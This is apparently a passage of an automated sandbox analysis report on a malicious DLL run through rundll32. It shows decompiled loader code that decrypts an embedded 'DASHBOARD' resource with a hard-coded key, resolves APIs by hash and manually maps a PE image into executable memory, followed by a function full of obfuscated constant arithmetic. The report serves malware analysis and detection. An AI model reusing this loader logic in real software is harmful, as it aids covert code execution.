                                                                                                                                  				_t131 = _t70;
                                                                                                                                  				if(_t70 != 0) {
                                                                                                                                  					_push(0x10046758);
                                                                                                                                  					E1002FE65(__ebx, _t109, __edi, __esi, __eflags);
                                                                                                                                  					_t72 = 0;
                                                                                                                                  				} else {
                                                                                                                                  					 *0x100530b8 = 0;
                                                                                                                                  					 *0x100530bc = 0;
                                                                                                                                  					 *0x100530c0 = 0;
                                                                                                                                  					 *0x100530c8 = 0;
                                                                                                                                  					 *0x100530c4 = 0;
                                                                                                                                  					 *0x100530cc = 0;
                                                                                                                                  					_v60 = 0;
                                                                                                                                  					_v56 = 0;
                                                                                                                                  					_t74 = FindResourceW(_a4, 0x1705, L"DASHBOARD"); // executed
                                                                                                                                  					_v60 = _t74;
                                                                                                                                  					_v56 = LoadResource(_a4, _v60);
                                                                                                                                  					_v52 = SizeofResource(_a4, _v60);
                                                                                                                                  					_v88 = 0x6b;
                                                                                                                                  					_v86 = 0x65;
                                                                                                                                  					_v84 = 0x72;
                                                                                                                                  					_v82 = 0x6e;
                                                                                                                                  					_v80 = 0x65;
                                                                                                                                  					_v78 = 0x6c;
                                                                                                                                  					_v76 = 0x33;
                                                                                                                                  					_v74 = 0x32;
                                                                                                                                  					_v72 = 0x2e;
                                                                                                                                  					_v70 = 0x64;
                                                                                                                                  					_v68 = 0x6c;
                                                                                                                                  					_v66 = 0x6c;
                                                                                                                                  					_v64 = 0;
                                                                                                                                  					_v40 = 0x6e;
                                                                                                                                  					_v38 = 0x74;
                                                                                                                                  					_v36 = 0x64;
                                                                                                                                  					_v34 = 0x6c;
                                                                                                                                  					_v32 = 0x6c;
                                                                                                                                  					_v30 = 0x2e;
                                                                                                                                  					_v28 = 0x64;
                                                                                                                                  					_v26 = 0x6c;
                                                                                                                                  					_v24 = 0x6c;
                                                                                                                                  					_v22 = 0;
                                                                                                                                  					_t78 = E10006A90(_t131); // executed
                                                                                                                                  					if(_t78 == 0) {
                                                                                                                                  						_t45 =  &_v88; // 0x6b
                                                                                                                                  						_t95 = E100048E0(_t45);
                                                                                                                                  						_t121 = _t121 + 4;
                                                                                                                                  						_v44 = _t95;
                                                                                                                                  					}
                                                                                                                                  					_t47 =  &_v40; // 0x6e
                                                                                                                                  					_v48 = E100048E0(_t47);
                                                                                                                                  					 *0x10055a7c = E100053D0(_v44, 0x6c705b40);
                                                                                                                                  					 *0x10055a78 = E100053D0(_v44, 0x531ff383);
                                                                                                                                  					_t133 =  *0x10055a78;
                                                                                                                                  					if( *0x10055a78 == 0) {
                                                                                                                                  						__eflags = 0x2000;
                                                                                                                                  						_v12 = VirtualAlloc(0, _v52, 0x00002000 -  *0x100530cc | 0x00001000, 0x40);
                                                                                                                                  					} else {
                                                                                                                                  						_t93 =  *0x10055a78(0xffffffff, 0, _v52, 0x3000, 0x40, 0); // executed
                                                                                                                                  						_v12 = _t93;
                                                                                                                                  					}
                                                                                                                                  					E1002FB00(_t96, _t118, _t119, _v12, _v56, _v52);
                                                                                                                                  					_t104 =  *0x100530b4; // 0x2795
                                                                                                                                  					_v16 = E1002F9A6(_t96, _v56, _t118, _t119, _t104);
                                                                                                                                  					E10002970(_t133, _v16, "6p2Z6a6CZ&M>ZR$a@Y$xnQ?<XBeh<22mz&0", 0x24);
                                                                                                                                  					_t109 = _v16;
                                                                                                                                  					E10003EE0(_v16, _v12, _v52);
                                                                                                                                  					_t92 = E100026A0(0x10055a64, _v12, _v52); // executed
                                                                                                                                  					 *0x10055a8c = _t92;
                                                                                                                                  					_t72 = 1;
                                                                                                                                  				}
                                                                                                                                  				return E1002F81E(_t72, _t96, _v20 ^ _t120, _t109, _t118, _t119);
                                                                                                                                  			}

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 10006A90: _malloc.LIBCMT ref: 10006A9C
                                                                                                                                  • _printf.LIBCMT ref: 1001265F
                                                                                                                                  • FindResourceW.KERNEL32(00000000,00001705,DASHBOARD), ref: 1001268A
                                                                                                                                  • LoadResource.KERNEL32(00000000,00000000), ref: 1001269B
                                                                                                                                  • SizeofResource.KERNEL32(00000000,00000000), ref: 100126AC
                                                                                                                                  • VirtualAllocExNuma.KERNELBASE(000000FF,00000000,00000000,00003000,00000040,00000000), ref: 100127AC
                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,00000000,-100510CC,00000040), ref: 100127D1
                                                                                                                                  • _malloc.LIBCMT ref: 100127F5
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Resource$AllocVirtual_malloc$FindLoadNumaSizeof_printf
                                                                                                                                  • String ID: .$.$2$3$6p2Z6a6CZ&M>ZR$a@Y$xnQ?<XBeh<22mz&0$DASHBOARD$d$d$e$kre3.l$l$l$l$l$l$l$l$n$ndldl
                                                                                                                                  • API String ID: 572389289-2839844625
                                                                                                                                  • Opcode ID: adac8d752e0c47dc141f46a7132d7a35c557a18b7d00a43f57a8df52d4076e8d
                                                                                                                                  • Instruction ID: 8f66a7c676ce8d0fa2ca8bd8519024a549b55f77dd79b918ae70bd0eec3b217e
                                                                                                                                  • Opcode Fuzzy Hash: adac8d752e0c47dc141f46a7132d7a35c557a18b7d00a43f57a8df52d4076e8d
                                                                                                                                  • Instruction Fuzzy Hash: FB613EB5D10218EBEB00DFA0DC95B9EBBB5FF08344F10911CE504AB390E7B66548CB6A
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Control-flow Graph

                                                                                                                                  [Figure: control-flow graph of function 10002280; legend: Executed / Not Executed]
                                                                                                                                  C-Code - Quality: 89%
                                                                                                                                  			E10002280(intOrPtr __ecx, signed short* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                                                                                                                                  				void* _v8;
                                                                                                                                  				void* _v12;
                                                                                                                                  				signed short* _v16;
                                                                                                                                  				void* _v20;
                                                                                                                                  				void* _v24;
                                                                                                                                  				long _v28;
                                                                                                                                  				signed int _v32;
                                                                                                                                  				intOrPtr _v64;
                                                                                                                                  				char _v68;
                                                                                                                                  				void* _v72;
                                                                                                                                  				intOrPtr _v76;
                                                                                                                                  				intOrPtr* _v80;
                                                                                                                                  				intOrPtr _v84;
                                                                                                                                  				void* _v88;
                                                                                                                                  				intOrPtr _v92;
                                                                                                                                  				intOrPtr _v96;
                                                                                                                                  				intOrPtr _v100;
                                                                                                                                  				void* _t180;
                                                                                                                                  				void* _t191;
                                                                                                                                  				void* _t198;
                                                                                                                                  				void* _t202;
                                                                                                                                  				intOrPtr _t209;
                                                                                                                                  				void* _t220;
                                                                                                                                  				intOrPtr _t269;
                                                                                                                                  				intOrPtr _t278;
                                                                                                                                  				intOrPtr _t326;
                                                                                                                                  
                                                                                                                                  				_v100 = __ecx;
                                                                                                                                  				_v72 = 0;
                                                                                                                                  				_v20 = 0;
                                                                                                                                  				if(E10001990(_v100, _a8, 0x40) != 0) {
                                                                                                                                  					_v16 = _a4;
                                                                                                                                  					if(( *_v16 & 0x0000ffff) == 0x5a4d) {
                                                                                                                                  						_t10 =  &(_v16[0x1e]); // 0xfffefe57
                                                                                                                                  						if(E10001990(_v100, _a8,  *_t10 + 0xf8) != 0) {
                                                                                                                                  							_t15 =  &(_v16[0x1e]); // 0xfffefe57
                                                                                                                                  							_v80 = _a4 +  *_t15;
                                                                                                                                  							if( *_v80 == 0x4550) {
                                                                                                                                  								if(( *(_v80 + 4) & 0x0000ffff) == 0x14c) {
                                                                                                                                  									if(( *(_v80 + 0x38) & 0x00000001) == 0) {
                                                                                                                                  										_v84 = _v80 + ( *(_v80 + 0x14) & 0x0000ffff) + 0x18;
                                                                                                                                  										_v32 =  *(_v80 + 0x38);
                                                                                                                                  										_v12 = 0;
                                                                                                                                  										while(_v12 < ( *(_v80 + 6) & 0x0000ffff)) {
                                                                                                                                  											if( *((intOrPtr*)(_v84 + 0x10)) != 0) {
                                                                                                                                  												_v88 =  *((intOrPtr*)(_v84 + 0xc)) +  *((intOrPtr*)(_v84 + 0x10));
                                                                                                                                  											} else {
                                                                                                                                  												_v88 =  *((intOrPtr*)(_v84 + 0xc)) + _v32;
                                                                                                                                  											}
                                                                                                                                  											if(_v88 > _v20) {
                                                                                                                                  												_v20 = _v88;
                                                                                                                                  											}
                                                                                                                                  											_v12 = _v12 + 1;
                                                                                                                                  											_v84 = _v84 + 0x28;
                                                                                                                                  										}
                                                                                                                                  										__imp__GetNativeSystemInfo( &_v68); // executed
                                                                                                                                  										_t59 = _v64 - 1; // 0x71
                                                                                                                                  										_v28 =  *((intOrPtr*)(_v80 + 0x50)) + _t59 &  !(_v64 - 1);
                                                                                                                                  										_t65 = _v64 - 1; // -1
                                                                                                                                  										if(_v28 == (_v20 + _t65 &  !(_v64 - 1))) {
                                                                                                                                  											_t180 = VirtualAlloc( *(_v80 + 0x34), _v28, 0x3000, 4); // executed
                                                                                                                                  											_v24 = _t180;
                                                                                                                                  											if(_v24 != 0) {
                                                                                                                                  												L26:
                                                                                                                                  												_v72 = HeapAlloc(GetProcessHeap(), 8, 0x34);
                                                                                                                                  												if(_v72 != 0) {
                                                                                                                                  													 *((intOrPtr*)(_v72 + 4)) = _v24;
                                                                                                                                  													asm("sbb edx, edx");
                                                                                                                                  													 *(_v72 + 0x14) =  ~( ~( *(_v80 + 0x16) & 0x2000));
                                                                                                                                  													 *((intOrPtr*)(_v72 + 0x1c)) = _a12;
                                                                                                                                  													 *((intOrPtr*)(_v72 + 0x20)) = _a16;
                                                                                                                                  													 *((intOrPtr*)(_v72 + 0x24)) = _a20;
                                                                                                                                  													 *((intOrPtr*)(_v72 + 0x28)) = _a24;
                                                                                                                                  													 *((intOrPtr*)(_v72 + 0x30)) = _v64;
                                                                                                                                  													if(E10001990(_v100, _a8,  *(_v80 + 0x54)) != 0) {
                                                                                                                                  														_t191 = VirtualAlloc(_v24,  *(_v80 + 0x54), 0x1000, 4); // executed
                                                                                                                                  														_v8 = _t191;
                                                                                                                                  														E10001810(_v8, _v16,  *(_v80 + 0x54));
                                                                                                                                  														_t115 =  &(_v16[0x1e]); // 0xfffefe57
                                                                                                                                  														 *_v72 = _v8 +  *_t115;
                                                                                                                                  														 *((intOrPtr*)( *_v72 + 0x34)) = _v24;
                                                                                                                                  														_t198 = E100019C0(_v100, _a4, _a8, _v80, _v72); // executed
                                                                                                                                  														if(_t198 != 0) {
                                                                                                                                  															_t269 =  *((intOrPtr*)( *_v72 + 0x34)) -  *(_v80 + 0x34);
                                                                                                                                  															_v76 = _t269;
                                                                                                                                  															if(_t269 == 0) {
                                                                                                                                  																 *((intOrPtr*)(_v72 + 0x18)) = 1;
                                                                                                                                  															} else {
                                                                                                                                  																 *((intOrPtr*)(_v72 + 0x18)) = E10001EB0(_v100, _v72, _v76);
                                                                                                                                  															}
                                                                                                                                  															if(E10001FF0(_v100, _v72) != 0) {
                                                                                                                                  																_t202 = E10001CB0(_v100, _v72); // executed
                                                                                                                                  																if(_t202 != 0) {
                                                                                                                                  																	if(E10001E30(_v100, _v72) != 0) {
                                                                                                                                  																		if( *((intOrPtr*)( *_v72 + 0x28)) == 0) {
                                                                                                                                  																			 *(_v72 + 0x2c) = 0;
                                                                                                                                  																			L49:
                                                                                                                                  																			return _v72;
                                                                                                                                  																		}
                                                                                                                                  																		if( *(_v72 + 0x14) == 0) {
                                                                                                                                  																			 *(_v72 + 0x2c) = _v24 +  *((intOrPtr*)( *_v72 + 0x28));
                                                                                                                                  																			L47:
                                                                                                                                  																			goto L49;
                                                                                                                                  																		}
                                                                                                                                  																		_v96 = _v24 +  *((intOrPtr*)( *_v72 + 0x28));
                                                                                                                                  																		_t209 =  *0x10055a88; // 0x0
                                                                                                                                  																		_t278 =  *0x10055a84; // 0x1
                                                                                                                                  																		_t326 =  *0x10055a80; // 0x10000000
                                                                                                                                  																		_v92 = _v96(_t326, _t278, _t209);
                                                                                                                                  																		if(_v92 != 0) {
                                                                                                                                  																			 *((intOrPtr*)(_v72 + 0x10)) = 1;
                                                                                                                                  																			goto L47;
                                                                                                                                  																		}
                                                                                                                                  																		SetLastError(0x45a);
                                                                                                                                  																		L50:
                                                                                                                                  																		E10002840(_v100, _v72);
                                                                                                                                  																		return 0;
                                                                                                                                  																	}
                                                                                                                                  																	goto L50;
                                                                                                                                  																}
                                                                                                                                  																goto L50;
                                                                                                                                  															}
                                                                                                                                  															goto L50;
                                                                                                                                  														}
                                                                                                                                  														goto L50;
                                                                                                                                  													}
                                                                                                                                  													goto L50;
                                                                                                                                  												}
                                                                                                                                  												VirtualFree(_v24, 0, 0x8000);
                                                                                                                                  												SetLastError(0xe);
                                                                                                                                  												return 0;
                                                                                                                                  											}
                                                                                                                                  											_t220 = VirtualAlloc(0, _v28, 0x3000, 4); // executed
                                                                                                                                  											_v24 = _t220;
                                                                                                                                  											if(_v24 != 0) {
                                                                                                                                  												goto L26;
                                                                                                                                  											}
                                                                                                                                  											SetLastError(0xe);
                                                                                                                                  											return 0;
                                                                                                                                  										}
                                                                                                                                  										SetLastError(0xc1);
                                                                                                                                  										return 0;
                                                                                                                                  									}
                                                                                                                                  									SetLastError(0xc1);
                                                                                                                                  									return 0;
                                                                                                                                  								}
                                                                                                                                  								SetLastError(0xc1);
                                                                                                                                  								return 0;
                                                                                                                                  							}
                                                                                                                                  							SetLastError(0xc1);
                                                                                                                                  							return 0;
                                                                                                                                  						}
                                                                                                                                  						return 0;
                                                                                                                                  					}
                                                                                                                                  					SetLastError(0xc1);
                                                                                                                                  					return 0;
                                                                                                                                  				}
                                                                                                                                  				return 0;
                                                                                                                                  			}






























                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 10001990: SetLastError.KERNEL32(0000000D,?,?,100022A5,10012839,00000040), ref: 100019A1
                                                                                                                                  • SetLastError.KERNEL32(000000C1,10012839,00000040), ref: 100022C8
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1452528299-0
                                                                                                                                  • Opcode ID: 0e09b11d72102b2f53da7248ccc42e4e27664b89a2cf1ce4a90d5e07d10becff
                                                                                                                                  • Instruction ID: 346a8eef4056a92d897d0963d9e5b5a8ca828aef95f805bf3d5880fe5d8ad0e4
                                                                                                                                  • Opcode Fuzzy Hash: 0e09b11d72102b2f53da7248ccc42e4e27664b89a2cf1ce4a90d5e07d10becff
                                                                                                                                  • Instruction Fuzzy Hash: 18E14974A00209DFEB48CF94C990AAEB7F6FF88340F208559E905AB359DB75AD42CF50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 148 2df8fd-2dfddc 149 2dfde0-2dfde6 148->149 150 2dfdec-2dfdf2 149->150 151 2dffa3-2dffbe call 2d4b61 149->151 152 2dfdf8-2dfdfe 150->152 153 2dffd1-2dffe9 call 2dab87 150->153 164 2dffc3-2dffc9 151->164 156 2dff5e-2dff64 152->156 157 2dfe04-2dfe0a 152->157 159 2dffee-2dfff3 153->159 160 2dff99-2dff9e 156->160 161 2dff66-2dff6a 156->161 162 2dff49-2dff59 call 2df899 157->162 163 2dfe10-2dfe16 157->163 167 2dfff4-2e0000 159->167 160->149 168 2dff6c-2dff73 161->168 169 2dff91-2dff97 161->169 162->149 170 2dfe8f-2dfeae call 2e46bb 163->170 171 2dfe18-2dfe1e 163->171 164->149 165 2dffcf 164->165 165->167 173 2dff81-2dff8a 168->173 169->160 169->161 176 2dfeb3-2dff44 call 2eda22 call 2edcf7 call 2d47ce call 2da8b0 170->176 171->164 175 2dfe24-2dfe5e call 2edcf7 call 2db23c 171->175 177 2dff8c-2dff8e 173->177 178 2dff75-2dff79 173->178 185 2dfe63-2dfe8a call 2da8b0 175->185 176->149 177->169 178->177 181 2dff7b-2dff7e 178->181 181->173 185->164
                                                                                                                                  C-Code - Quality: 80%
                                                                                                                                  			E002DF8FD() {
                                                                                                                                  				char _v520;
                                                                                                                                  				char _v1040;
                                                                                                                                  				char _v1560;
                                                                                                                                  				signed int _v1564;
                                                                                                                                  				signed int _v1568;
                                                                                                                                  				signed int _v1572;
                                                                                                                                  				signed int _v1576;
                                                                                                                                  				signed int _v1580;
                                                                                                                                  				signed int _v1584;
                                                                                                                                  				signed int _v1588;
                                                                                                                                  				signed int _v1592;
                                                                                                                                  				signed int _v1596;
                                                                                                                                  				signed int _v1600;
                                                                                                                                  				signed int _v1604;
                                                                                                                                  				signed int _v1608;
                                                                                                                                  				signed int _v1612;
                                                                                                                                  				signed int _v1616;
                                                                                                                                  				signed int _v1620;
                                                                                                                                  				signed int _v1624;
                                                                                                                                  				signed int _v1628;
                                                                                                                                  				signed int _v1632;
                                                                                                                                  				signed int _v1636;
                                                                                                                                  				signed int _v1640;
                                                                                                                                  				signed int _v1644;
                                                                                                                                  				signed int _v1648;
                                                                                                                                  				signed int _v1652;
                                                                                                                                  				signed int _v1656;
                                                                                                                                  				signed int _v1660;
                                                                                                                                  				signed int _v1664;
                                                                                                                                  				signed int _v1668;
                                                                                                                                  				signed int _v1672;
                                                                                                                                  				signed int _v1676;
                                                                                                                                  				signed int _v1680;
                                                                                                                                  				signed int _v1684;
                                                                                                                                  				signed int _v1688;
                                                                                                                                  				signed int _v1692;
                                                                                                                                  				signed int _v1696;
                                                                                                                                  				signed int _v1700;
                                                                                                                                  				signed short* _t368;
                                                                                                                                  				signed int _t381;
                                                                                                                                  				signed int* _t383;
                                                                                                                                  				signed int _t385;
                                                                                                                                  				signed int _t386;
                                                                                                                                  				signed int _t387;
                                                                                                                                  				signed int _t388;
                                                                                                                                  				signed int _t389;
                                                                                                                                  				signed int _t390;
                                                                                                                                  				signed int _t391;
                                                                                                                                  				signed int _t392;
                                                                                                                                  				signed int _t393;
                                                                                                                                  				signed int _t394;
                                                                                                                                  				signed int _t395;
                                                                                                                                  				signed int _t405;
                                                                                                                                  				signed int* _t438;
                                                                                                                                  				void* _t439;
                                                                                                                                  				signed short* _t445;
                                                                                                                                  				signed int* _t446;
                                                                                                                                  
                                                                                                                                  				_t446 =  &_v1700;
                                                                                                                                  				_v1636 = 0x636551;
                                                                                                                                  				_t2 =  &_v1636; // 0x636551
                                                                                                                                  				_t385 = 0x5e;
                                                                                                                                  				_v1636 =  *_t2 / _t385;
                                                                                                                                  				_t383 = 0;
                                                                                                                                  				_t386 = 0x7a;
                                                                                                                                  				_t439 = 0x12dab9f;
                                                                                                                                  				_v1636 = _v1636 * 0x55;
                                                                                                                                  				_v1636 = _v1636 ^ 0x0059e0ec;
                                                                                                                                  				_v1616 = 0x84ec4b;
                                                                                                                                  				_v1616 = _v1616 + 0xffff958e;
                                                                                                                                  				_v1616 = _v1616 << 6;
                                                                                                                                  				_v1616 = _v1616 ^ 0x212f9cfc;
                                                                                                                                  				_v1624 = 0x57c2af;
                                                                                                                                  				_v1624 = _v1624 / _t386;
                                                                                                                                  				_v1624 = _v1624 >> 0xa;
                                                                                                                                  				_v1624 = _v1624 ^ 0x000a9340;
                                                                                                                                  				_v1676 = 0x94d6a3;
                                                                                                                                  				_v1676 = _v1676 >> 3;
                                                                                                                                  				_t387 = 0x41;
                                                                                                                                  				_v1676 = _v1676 * 0x79;
                                                                                                                                  				_v1676 = _v1676 * 0x68;
                                                                                                                                  				_v1676 = _v1676 ^ 0x9280c2f7;
                                                                                                                                  				_v1644 = 0x578290;
                                                                                                                                  				_v1644 = _v1644 | 0x80e552f7;
                                                                                                                                  				_v1644 = _v1644 + 0xffffd80b;
                                                                                                                                  				_v1644 = _v1644 ^ 0x80feae5e;
                                                                                                                                  				_v1652 = 0x70c956;
                                                                                                                                  				_v1652 = _v1652 ^ 0x31ba76f8;
                                                                                                                                  				_v1652 = _v1652 ^ 0x87f2510e;
                                                                                                                                  				_v1652 = _v1652 ^ 0xb63594c0;
                                                                                                                                  				_v1696 = 0x39dcdb;
                                                                                                                                  				_v1696 = _v1696 * 0x22;
                                                                                                                                  				_v1696 = _v1696 >> 0xf;
                                                                                                                                  				_v1696 = _v1696 * 0x75;
                                                                                                                                  				_v1696 = _v1696 ^ 0x000247c6;
                                                                                                                                  				_v1572 = 0x793846;
                                                                                                                                  				_v1572 = _v1572 + 0xfc60;
                                                                                                                                  				_v1572 = _v1572 ^ 0x007fa213;
                                                                                                                                  				_v1576 = 0x3629f6;
                                                                                                                                  				_v1576 = _v1576 | 0x7f6cc17b;
                                                                                                                                  				_v1576 = _v1576 ^ 0x7f7c74a2;
                                                                                                                                  				_v1600 = 0x630dc0;
                                                                                                                                  				_v1600 = _v1600 | 0x8a3170d6;
                                                                                                                                  				_v1600 = _v1600 ^ 0x8a7fe201;
                                                                                                                                  				_v1664 = 0xe79625;
                                                                                                                                  				_v1664 = _v1664 * 0x57;
                                                                                                                                  				_v1664 = _v1664 ^ 0xe47ae09a;
                                                                                                                                  				_v1664 = _v1664 + 0xffff598f;
                                                                                                                                  				_v1664 = _v1664 ^ 0xaac0e7d1;
                                                                                                                                  				_v1648 = 0xac147c;
                                                                                                                                  				_v1648 = _v1648 << 4;
                                                                                                                                  				_v1648 = _v1648 / _t387;
                                                                                                                                  				_v1648 = _v1648 ^ 0x00264750;
                                                                                                                                  				_v1588 = 0x745952;
                                                                                                                                  				_t98 =  &_v1588; // 0x745952
                                                                                                                                  				_v1588 =  *_t98 * 0x3a;
                                                                                                                                  				_v1588 = _v1588 ^ 0x1a53f4d8;
                                                                                                                                  				_v1672 = 0x57a21b;
                                                                                                                                  				_t388 = 0x49;
                                                                                                                                  				_v1672 = _v1672 / _t388;
                                                                                                                                  				_t389 = 0x63;
                                                                                                                                  				_v1672 = _v1672 / _t389;
                                                                                                                                  				_v1672 = _v1672 | 0xd6f4ed27;
                                                                                                                                  				_v1672 = _v1672 ^ 0xd6feee0f;
                                                                                                                                  				_v1620 = 0xc904e8;
                                                                                                                                  				_t390 = 0x17;
                                                                                                                                  				_v1620 = _v1620 * 0x6d;
                                                                                                                                  				_v1620 = _v1620 + 0x178d;
                                                                                                                                  				_v1620 = _v1620 ^ 0x5592dda0;
                                                                                                                                  				_v1688 = 0x59d198;
                                                                                                                                  				_v1688 = _v1688 | 0x5938a823;
                                                                                                                                  				_v1688 = _v1688 ^ 0x788d0eee;
                                                                                                                                  				_v1688 = _v1688 + 0xffff1978;
                                                                                                                                  				_v1688 = _v1688 ^ 0x21fe2fab;
                                                                                                                                  				_v1612 = 0xa097a2;
                                                                                                                                  				_v1612 = _v1612 << 9;
                                                                                                                                  				_v1612 = _v1612 / _t390;
                                                                                                                                  				_v1612 = _v1612 ^ 0x02dc2d90;
                                                                                                                                  				_v1700 = 0xb7b4a0;
                                                                                                                                  				_t391 = 0x36;
                                                                                                                                  				_v1700 = _v1700 / _t391;
                                                                                                                                  				_v1700 = _v1700 >> 1;
                                                                                                                                  				_v1700 = _v1700 | 0xee164e4b;
                                                                                                                                  				_v1700 = _v1700 ^ 0xee1e6de5;
                                                                                                                                  				_v1680 = 0xe4ad14;
                                                                                                                                  				_v1680 = _v1680 | 0xe839ddc8;
                                                                                                                                  				_v1680 = _v1680 ^ 0xfe881b96;
                                                                                                                                  				_t392 = 0x42;
                                                                                                                                  				_v1680 = _v1680 * 0x4e;
                                                                                                                                  				_v1680 = _v1680 ^ 0xd7ed2c6e;
                                                                                                                                  				_v1656 = 0xa710a4;
                                                                                                                                  				_v1656 = _v1656 + 0xfffff8f1;
                                                                                                                                  				_v1656 = _v1656 ^ 0xcc5b21c1;
                                                                                                                                  				_v1656 = _v1656 ^ 0xccf98fb8;
                                                                                                                                  				_v1628 = 0x5fc40d;
                                                                                                                                  				_v1628 = _v1628 + 0xb682;
                                                                                                                                  				_v1628 = _v1628 << 6;
                                                                                                                                  				_v1628 = _v1628 ^ 0x181c8c04;
                                                                                                                                  				_v1640 = 0xd7aa78;
                                                                                                                                  				_v1640 = _v1640 + 0x8e1d;
                                                                                                                                  				_v1640 = _v1640 / _t392;
                                                                                                                                  				_v1640 = _v1640 ^ 0x0007a72a;
                                                                                                                                  				_v1580 = 0xbf48f6;
                                                                                                                                  				_t393 = 0x25;
                                                                                                                                  				_v1580 = _v1580 * 0xd;
                                                                                                                                  				_v1580 = _v1580 ^ 0x09b7b49e;
                                                                                                                                  				_v1564 = 0xff195;
                                                                                                                                  				_v1564 = _v1564 + 0x8c1b;
                                                                                                                                  				_v1564 = _v1564 ^ 0x00104e06;
                                                                                                                                  				_v1684 = 0xbf1e83;
                                                                                                                                  				_v1684 = _v1684 / _t393;
                                                                                                                                  				_t394 = 0x77;
                                                                                                                                  				_v1684 = _v1684 / _t394;
                                                                                                                                  				_v1684 = _v1684 + 0xa662;
                                                                                                                                  				_v1684 = _v1684 ^ 0x0006fc0d;
                                                                                                                                  				_v1596 = 0xc39bae;
                                                                                                                                  				_v1596 = _v1596 << 2;
                                                                                                                                  				_v1596 = _v1596 ^ 0x030cfbaf;
                                                                                                                                  				_v1568 = 0x66568e;
                                                                                                                                  				_v1568 = _v1568 | 0x44ac0d6e;
                                                                                                                                  				_v1568 = _v1568 ^ 0x44e9cf2b;
                                                                                                                                  				_v1692 = 0x3d2b27;
                                                                                                                                  				_v1692 = _v1692 + 0x3fae;
                                                                                                                                  				_t395 = 0x71;
                                                                                                                                  				_v1692 = _v1692 / _t395;
                                                                                                                                  				_v1692 = _v1692 + 0xffff1a11;
                                                                                                                                  				_v1692 = _v1692 ^ 0xffffbf57;
                                                                                                                                  				_v1632 = 0xb4dfda;
                                                                                                                                  				_v1632 = _v1632 * 9;
                                                                                                                                  				_v1632 = _v1632 >> 3;
                                                                                                                                  				_v1632 = _v1632 ^ 0x00c4553b;
                                                                                                                                  				_v1584 = 0x206e7a;
                                                                                                                                  				_v1584 = _v1584 << 7;
                                                                                                                                  				_v1584 = _v1584 ^ 0x10371375;
                                                                                                                                  				_v1592 = 0x689459;
                                                                                                                                  				_v1592 = _v1592 + 0xffffb773;
                                                                                                                                  				_v1592 = _v1592 ^ 0x00637077;
                                                                                                                                  				_v1660 = 0x8b14df;
                                                                                                                                  				_v1660 = _v1660 << 0xd;
                                                                                                                                  				_v1660 = _v1660 + 0x9803;
                                                                                                                                  				_v1660 = _v1660 << 0xa;
                                                                                                                                  				_v1660 = _v1660 ^ 0x71eeeb6f;
                                                                                                                                  				_v1608 = 0x8e767e;
                                                                                                                                  				_v1608 = _v1608 | 0xfaf7fbb6;
                                                                                                                                  				_v1608 = _v1608 ^ 0xfaf9bdf5;
                                                                                                                                  				_v1668 = 0xccd677;
                                                                                                                                  				_v1668 = _v1668 * 0x78;
                                                                                                                                  				_v1668 = _v1668 + 0xffff6b3d;
                                                                                                                                  				_v1668 = _v1668 + 0xf0ff;
                                                                                                                                  				_v1668 = _v1668 ^ 0x600a3b9e;
                                                                                                                                  				_v1604 = 0x7c05f9;
                                                                                                                                  				_v1604 = _v1604 + 0xd55a;
                                                                                                                                  				_v1604 = _v1604 ^ 0x007aedaa;
                                                                                                                                  				_t445 = _v1604;
                                                                                                                                  				while(_t439 != 0x12dab9f) {
                                                                                                                                  					if(_t439 == 0x2f8e73a) {
                                                                                                                                  						_push(_v1604);
                                                                                                                                  						_push(_t383);
                                                                                                                                  						_push(_t395);
                                                                                                                                  						_push(_t383);
                                                                                                                                  						_push(_t383);
                                                                                                                                  						_push(_v1668);
                                                                                                                                  						_push(_t445);
                                                                                                                                  						E002DAB87(_v1660, _v1608, __eflags);
                                                                                                                                  						_t383 = 1;
                                                                                                                                  						__eflags = 1;
                                                                                                                                  						L23:
                                                                                                                                  						return _t383;
                                                                                                                                  					}
                                                                                                                                  					if(_t439 == 0x92208ae) {
                                                                                                                                  						_t368 = _t445;
                                                                                                                                  						__eflags =  *_t445 - _t383;
                                                                                                                                  						if(__eflags == 0) {
                                                                                                                                  							L18:
                                                                                                                                  							_t439 = 0xeef82b0;
                                                                                                                                  							continue;
